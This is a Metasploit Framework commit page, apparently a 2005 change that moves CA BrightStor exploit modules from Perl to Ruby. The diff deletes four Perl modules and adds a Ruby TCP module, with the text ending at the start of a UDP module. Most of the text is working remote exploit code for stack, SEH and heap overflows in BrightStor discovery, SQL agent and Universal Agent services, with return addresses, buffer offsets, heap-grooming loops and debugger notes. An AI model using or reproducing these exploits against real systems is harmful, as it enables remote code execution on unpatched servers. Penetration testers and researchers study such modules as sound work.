infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Brightstor exploits 

git-svn-id: file:///home/svn/incoming/trunk@3130 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2005-11-26 22:12:54 +00:00
parent 40aa62968f
commit 1ca0837a3b
9 changed files with 498 additions and 991 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

226
dev/porting/queue/cabrightstor_disco.rb
View File

@ -1,226 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor Discovery Service Overflow',
'Description' => %q{
This module exploits a vulnerability in the CA BrightStor
Discovery Service. This vulnerability occurs when a large
request is sent to UDP port 41524, triggering a stack
overflow.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '13613'],
[ 'BID', '12491'],
[ 'CVE', '2005-0260'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'],
[ 'MIL', '14'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2048,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'win32, win2000, winxp, win2003',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => 'Dec 20 2004',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::cabrightstor_disco;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'CA BrightStor Discovery Service Overflow',
'Version' => '$Revision$',
'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],
'Priv' => 1,
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 41524],
},
'Payload' =>
{
'Space' => 2048,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a vulnerability in the CA BrightStor
Discovery Service. This vulnerability occurs when a large
request is sent to UDP port 41524, triggering a stack
overflow.
}),
'Refs' =>
[
['OSVDB', '13613'],
['BID', '12491'],
['CVE', '2005-0260'],
['URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'],
['MIL', '14'],
],
'Targets' =>
[
['cheyprod.dll 12/12/2003', 0x23808eb0], # call to edi reg
],
'Keys' => ['brightstor'],
'DisclosureDate' => 'Dec 20 2004',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = 41523;
# Connection #1 should not receive a response
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$s->Send("META");
my $res = $s->Recv(-1, 1);
$s->Close;
if ($res) {
$self->PrintLine("[*] The discovery returned a strange response: $res");
}
# Connection #2 should receive the hostname of the target
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$s->Send("hMETA");
my $res = $s->Recv(-1, 1);
$s->Close;
if (! $res) {
$self->PrintLine("[*] The discovery service did not respond to our query");
return $self->CheckCode('Generic');
}
$self->PrintLine("[*] Discovery service active on host: $res");
return $self->CheckCode('Detected');
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
my $s = Msf::Socket::Udp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
my $bang = "X" x 4096;
# esp @ 971
# ret @ 968
# edi @ 1046
# end = 4092
substr($bang, 968, 4, pack('V', $target->[1]));
substr($bang, 1046, length($shellcode), $shellcode);
$self->PrintLine("[*] Sending " .length($bang) . " bytes to remote host.");
$s->Send($bang);
$s->Recv(-1, 5);
return;
}
1;
=end
end
end

243
dev/porting/queue/cabrightstor_disco_servicepc.rb
View File

@ -1,243 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor Discovery Service SERVICEPC Overflow',
'Description' => %q{
This module exploits a vulnerability in the CA BrightStor
Discovery Service. This vulnerability occurs when a specific
type of request is sent to the TCP listener on port 41523.
This vulnerability was discovered by cybertronic[at]gmx.net
and affects all known versions of the BrightStor product.
This module is based on the 'cabrightstor_disco' exploit by
Thor Doomen.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '13814'],
[ 'BID', '12536'],
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html'],
[ 'MIL', '15'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2048,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'win32, win2000, winxp, win2003',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => 'Feb 14 2005',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::cabrightstor_disco_servicepc;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'CA BrightStor Discovery Service SERVICEPC Overflow',
'Version' => '$Revision$',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],
'Priv' => 1,
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 41523],
},
'Payload' =>
{
'Space' => 2048,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a vulnerability in the CA BrightStor
Discovery Service. This vulnerability occurs when a specific
type of request is sent to the TCP listener on port 41523. This
vulnerability was discovered by cybertronic[at]gmx.net and affects
all known versions of the BrightStor product. This module is based
on the 'cabrightstor_disco' exploit by Thor Doomen.
}),
'Refs' =>
[
['OSVDB', '13814'],
['BID', '12536'],
['URL', 'http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html'],
['MIL', '15'],
],
'Targets' =>
[
['cheyprod.dll 12/12/2003', 0x23805714], # pop/pop/ret
],
'Keys' => ['brightstor'],
'DisclosureDate' => 'Feb 14 2005',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
# Connection #1 should not receive a response
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$s->Send("META");
my $res = $s->Recv(-1, 1);
$s->Close;
if ($res) {
$self->PrintLine("[*] The discovery returned a strange response: $res");
}
# Connection #2 should receive the hostname of the target
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$s->Send("hMETA");
my $res = $s->Recv(-1, 1);
$s->Close;
if (! $res) {
$self->PrintLine("[*] The discovery service did not respond to our query");
return $self->CheckCode('Generic');
}
$self->PrintLine("[*] Discovery service active on host: $res");
return $self->CheckCode('Detected');
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
my $poof = Pex::Text::EnglishText(4096);
# Overwriting the return address works well, but the only register
# pointing back to our code is 'esp'. The following stub overwrites
# the SEH frame instead, making things a bit easier.
substr($poof, 1024, 2, "\xeb\x06");
substr($poof, 1028, 4, pack('V', $target->[1]));
substr($poof, 1032, length($shellcode), $shellcode);
# Make sure the return address is invalid to trigger SEH
substr($poof, 900, 100, chr(128 + rand()*127) x 100);
my $bang =
"\x9b".
"SERVICEPC".
"\x18".
pack('N', 0x01020304).
"SERVICEPC".
"\x01\x0c\x6c\x93\xce\x18\x18\x41".
$poof;
$self->PrintLine("[*] Sending " .length($bang) . " bytes to remote host.");
$s->Send($bang);
# Closing the socket too early breaks the exploit
$s->Recv(-1, 5);
return;
}
1;
=end
end
end

209
dev/porting/queue/cabrightstor_sqlagent.rb
View File

@ -1,209 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor Agent for Microsoft SQL Overflow',
'Description' => %q{
This module exploits a vulnerability in the CA BrightStor
Agent for Microsoft SQL Server. This vulnerability was
discovered by cybertronic[at]gmx.net.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2005-1272'],
[ 'BID', '14453'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities'],
[ 'URL', 'http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239'],
[ 'MIL', '83'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'win32, winnt, win2000, winxp, win2003',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => 'Aug 02 2005',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::cabrightstor_sqlagent;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'CA BrightStor Agent for Microsoft SQL Overflow',
'Version' => '$Revision$',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
'Priv' => 1,
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 6070],
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a vulnerability in the CA BrightStor
Agent for Microsoft SQL Server. This vulnerability was discovered
by cybertronic[at]gmx.net.
}),
'Refs' =>
[
[ 'CVE', '2005-1272' ],
[ 'BID', '14453' ],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities' ],
[ 'URL', 'http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239' ],
[ 'MIL', '83'],
],
'Targets' =>
[
# This exploit requires a jmp esp for return
['ARCServe 11.0 Asbrdcst.dll 12/12/2003', 0x20c11d64], # jmp esp
['ARCServe 11.1 Asbrdcst.dll 07/21/2004', 0x20c0cd5b], # push esp, ret
['ARCServe 11.1 SP1 Asbrdcst.dll 01/14/2005', 0x20c0cd1b], # push esp, ret
# From minishare exploit
['Windows 2000 SP0-SP3 English', 0x7754a3ab ], # jmp esp
['Windows 2000 SP4 English', 0x7517f163 ], # jmp esp
['Windows XP SP0-SP1 English', 0x71ab1d54 ], # push esp, ret
['Windows XP SP2 English', 0x71ab9372 ], # push esp, ret
['Windows 2003 SP0 English', 0x71c03c4d ], # push esp, ret
['Windows 2003 SP1 English', 0x71c033a0 ], # push esp, ret
],
'Keys' => ['brightstor'],
'DisclosureDate' => 'Aug 02 2005',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
# The 'one line' request does not work against Windows 2003
for (my $i=0; $i <5; $i++)
{
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
my $crap = ("\xff" x 0x12000);
$s->Send($crap);
$s->Recv(-1, 8);
$s->Close();
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
# 3288 bytes max
# 696 == good data (1228 bytes contiguous) @ 0293f5e0
# 3168 == return address
# 3172 == esp @ 0293ff8c (2476 from good data)
my $poof = Pex::Text::EnglishText(3288);
substr($poof, 696, length($shellcode), $shellcode);
substr($poof, 3168, 4, pack('V', $target->[1])); # jmp esp
substr($poof, 3172, 5, "\xe9\x4f\xf6\xff\xff"); # jmp -2476
$self->PrintLine("[*] Sending " .length($poof) . " bytes to remote host.");
$s->Send($poof);
$s->Recv(-1, 8);
$self->Handler($s);
$s->Close();
}
return;
}
1;
=end
end
end

312
dev/porting/queue/cabrightstor_uniagent.rb
View File

@ -1,312 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor Universal Agent Overflow',
'Description' => %q{
This module exploits a convoluted heap overflow in the CA
BrightStor Universal Agent service. Triple userland
exception results in heap growth and execution of
dereferenced function pointer at a specified address.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'MIL', '16'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 164,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'win32, win2000, winxp, win2003, winnt',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => '',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::cabrightstor_uniagent;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'CA BrightStor Universal Agent Overflow',
'Version' => '$Revision$',
'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003', 'winnt' ],
'Priv' => 1,
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 6050],
},
'Payload' =>
{
# 250 bytes of space (bytes 0xa5 -> 0xa8 = reversed)
'Space' => 164,
'BadChars' => "\x00",
'Keys' => ['+ws2ord'],
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a convoluted heap overflow in the CA
BrightStor Universal Agent service. Triple userland exception
results in heap growth and execution of dereferenced function pointer
at a specified address.
}),
'Refs' =>
[
['MIL', '16'],
['URL', 'http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities'],
],
'DefaultTarget' => 0,
'Targets' => [
['Magic Heap Target #1', 0x01625c44], # far away heap address
],
'Keys' => ['brightstor'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
my $probe =
"\x00\x00\x00\x00\x03\x20\xbc\x02".
("2" x 256).
("A" x 32).
"\x0B\x11\x0B\x0F\x03\x0E\x09\x0B".
"\x16\x11\x14\x10\x11\x04\x03\x1C".
"\x11\x1C\x15\x01\x00\x06".
("X" x 390);
$s->Send($probe);
my $res = $s->Recv(8, 10);
$s->Close;
if ($res eq "\x00\x00\x73\x02\x32\x32\x00\x00") {
$self->PrintLine('[*] This system appears to be vulnerable');
return $self->CheckCode('Appears');
}
$self->PrintLine('[*] This system does not appear to be vulnerable');
return;
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
# The server reverses four bytes starting at 0xa5
# my $patchy = join('', reverse(split('',substr($shellcode, 0xa5, 4))));
# substr($shellcode, 0xa5, 4, $patchy);
# Create the request
my $boom = "X" x 1024;
# Required field to trigger the fault
substr($boom, 248, 2, pack('v', 1000));
# The shellcode, limited to 250 bytes (no nulls)
substr($boom, 256, length($shellcode), $shellcode);
# This should point to itself
substr($boom, 576, 4, pack('V', $target->[1]));
# This points to the code below
substr($boom, 580, 4, pack('V', $target->[1]+8 ));
# We have 95 bytes, use it to hop back to shellcode
substr($boom, 584, 6, "\x68" . pack('V', $target->[1]-320) . "\xc3");
# Stick the protocol header in front of our request
$boom = "\x00\x00\x00\x00\x03\x20\xa8\x02".$boom;
$self->PrintLine("[*] Sending " .length($boom) . " bytes to remote host.");
# We keep making new connections and triggering the fault until
# the heap is grown to encompass our known return address. Once
# this address has been allocated and filled, each subsequent
# request will result in our shellcode being executed.
for (1 .. 200) {
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
if ($_ % 10 == 0) {
$self->PrintLine("[*] Sending request $_ of 200...");
}
$s->Send($boom);
$s->Close;
# Give the process time to recover from each exception
select(undef, undef, undef, 0.1);
}
return;
}
1;
__END__
012a0d91 8b8e445c0000 mov ecx,[esi+0x5c44]
012a0d97 83c404 add esp,0x4
012a0d9a 85c9 test ecx,ecx
012a0d9c 7407 jz ntagent+0x20da5 (012a0da5)
012a0d9e 8b11 mov edx,[ecx] ds:0023:41327441=???????
012a0da0 6a01 push 0x1
012a0da2 ff5204 call dword ptr [edx+0x4]
Each request will result in another chunk being allocated, the exception
causes these chunks to never be freed. The large chunk size allows us to
predict the location of our buffer and grow our buffer to where we need it.
If these addresses do not match up, run this exploit, then attach with WinDbg:
> s 0 Lfffffff 0x44 0x5c 0x61 0x01
Figure out the pattern, replace the return address, restart the service,
and run it through again. Only tested on WinXP SP1
011b5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
011c5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
011d5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
011e5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
011f5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01205c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01225c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01235c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01245c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01255c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01265c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01275c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01285c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01295c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
012a5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
012b5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
012c5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
012d5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
012e5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
012f5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01305c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01315c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01525c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01535c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01545c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01555c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01565c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01575c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01585c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01595c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
015a5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
015b5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
015c5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
015d5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
015e5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
015f5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01605c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01615c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01625c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01635c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01645c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01655c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01665c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01675c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01685c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01695c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
016a5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
016b5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
016c5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
016d5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01725c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
017e5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
=end
end
end

1
modules/exploits/osx/arkeia/arkeia_type77_macos.rb
View File

@ -32,7 +32,6 @@ class Exploits::Osx::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
'Space' => 1000,
'BadChars' => "\x00",
'MinNops' => 700,
},
'Targets' =>
[

122
modules/exploits/windows/brightstor/brightstor_disco_tcp.rb Normal file
View File

@ -0,0 +1,122 @@
require 'msf/core'
module Msf
class Exploits::Windows::Brightstor::BrightstorDiscoTcp < Msf::Exploit::Remote
include Exploit::Remote::Tcp
include Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor Discovery Service TCP Overflow',
'Description' => %q{
This module exploits a vulnerability in the CA BrightStor
Discovery Service. This vulnerability occurs when a specific
type of request is sent to the TCP listener on port 41523.
This vulnerability was discovered by cybertronic[at]gmx.net
and affects all known versions of the BrightStor product.
This module is based on the 'cabrightstor_disco' exploit by
Thor Doomen.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '13814'],
[ 'BID', '12536'],
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html'],
[ 'MIL', '15'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2048,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[
'cheyprod.dll 12/12/2003',
{
'Platform' => 'win',
'Ret' => 0x23805714, # pop/pop/ret
},
],
],
'DisclosureDate' => 'Feb 14 2005',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(41523)
], self)
end
def check
# The first request should have no reply
csock = Rex::Socket::Tcp.create(
'PeerHost' => datastore['RHOST'],
'PeerPort' => datastore['RPORT'],
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self,
})
csock.put('META')
x = csock.get_once(-1, 3)
csock.close
# The second request should be replied with the host name
csock = Rex::Socket::Tcp.create(
'PeerHost' => datastore['RHOST'],
'PeerPort' => datastore['RPORT'],
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self,
})
csock.put('hMETA')
y = csock.get_once(-1, 3)
csock.close
if (y and not x)
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
connect
buf = Rex::Text.rand_text_english(4096)
# Overwriting the return address works well, but the only register
# pointing back to our code is 'esp'. The following stub overwrites
# the SEH frame instead, making things a bit easier.
seh = generate_seh_payload(target.ret)
buf[1024, seh.len] = seh
# Make sure the return address is invalid to trigger SEH
buf[ 900, 100] = (rand(127)+128).chr * 100
# SERVICEPC is the client host name actually =P (thanks Juliano!)
req = "\x9b" + 'SERVICEPC' + "\x18" + [0x01020304].pack('N') + 'SERVICEPC' + "\x01\x0c\x6c\x93\xce\x18\x18\x41"
req << buf
sock.put(req)
sock.get_once
handler
disconnect
end
end
end

114
modules/exploits/windows/brightstor/brightstor_disco_udp.rb Normal file
View File

@ -0,0 +1,114 @@
require 'msf/core'
module Msf
class Exploits::Windows::Brightstor::BrightstorDiscoUdp < Msf::Exploit::Remote
include Exploit::Remote::Tcp
include Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor Discovery Service Overflow',
'Description' => %q{
